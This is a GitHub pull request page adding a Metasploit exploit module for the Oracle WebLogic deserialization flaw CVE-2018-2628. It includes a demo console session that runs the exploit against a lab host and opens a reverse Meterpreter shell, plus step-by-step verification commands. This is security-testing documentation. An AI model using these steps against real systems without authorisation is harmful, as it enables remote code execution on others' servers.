Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add weblogic_deserialize module CVE-2018-2628 #10436

Merged
merged 2 commits into from Aug 9, 2018

Conversation

@jrobles-r7
Copy link
Contributor

commented Aug 8, 2018

Adds a module for CVE-2018-2628, Oracle Weblogic Deserialization Vuln.
Currently works on Windows.
The module has been testing against Oracle Weblogic Server 10.3.6.0 running with JDK v7u17.

Future TODO

  • Add/Test on Linux
  • Fix Docs

Demo

msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121
srvhost => 172.22.222.121
msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888
srvport => 8888
msf5 exploit(multi/misc/weblogic_deserialize) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/weblogic_deserialize) > 
[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] Sending stage (179779 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500
sessions -i 1
[*] Starting interaction with 1...
 meterpreter > sysinfo
Computer        : _
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Verification

  • ./msfconsole -q
  • use exploit/windows/misc/weblogic_deserialize
  • set rhosts <rhost>
  • set srvhost <srvhos>t
  • set srvport <srvport>
  • run
  • Get a shell

@wchen-r7 wchen-r7 self-assigned this Aug 8, 2018

@wchen-r7 wchen-r7 merged commit 66e5685 into rapid7:master Aug 9, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
wchen-r7 added a commit that referenced this pull request Aug 9, 2018
msjenkins-r7 added a commit that referenced this pull request Aug 9, 2018
@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 9, 2018

Release Notes

This adds an exploit module for CVE-2018-2628, targeting an Oracle Weblogic deserialization vulnerability on Windows. The module has been testing against Oracle Weblogic Server 10.3.6.0 running with JDK v7u17.

@jrobles-r7 jrobles-r7 deleted the jrobles-r7:weblogic-deserial-rce branch Aug 9, 2018

@kfr-ma

This comment has been minimized.

Copy link
Contributor

commented Aug 16, 2018

Hi guys ,

Good Work, Good news :) , we were waiting of this module, do u have any idea for the date of linux/universal version release to this exploit.
We can test it with u for linux / unix environnement .

Thx in advance.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor Author

commented Aug 16, 2018

Including a condition check before generating the payload here might be what you want. If target is linux generate non-powershell command.

@kfr-ma

This comment has been minimized.

Copy link
Contributor

commented Aug 16, 2018

Yes jrobles-r7 , this is my need .

Thx .

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.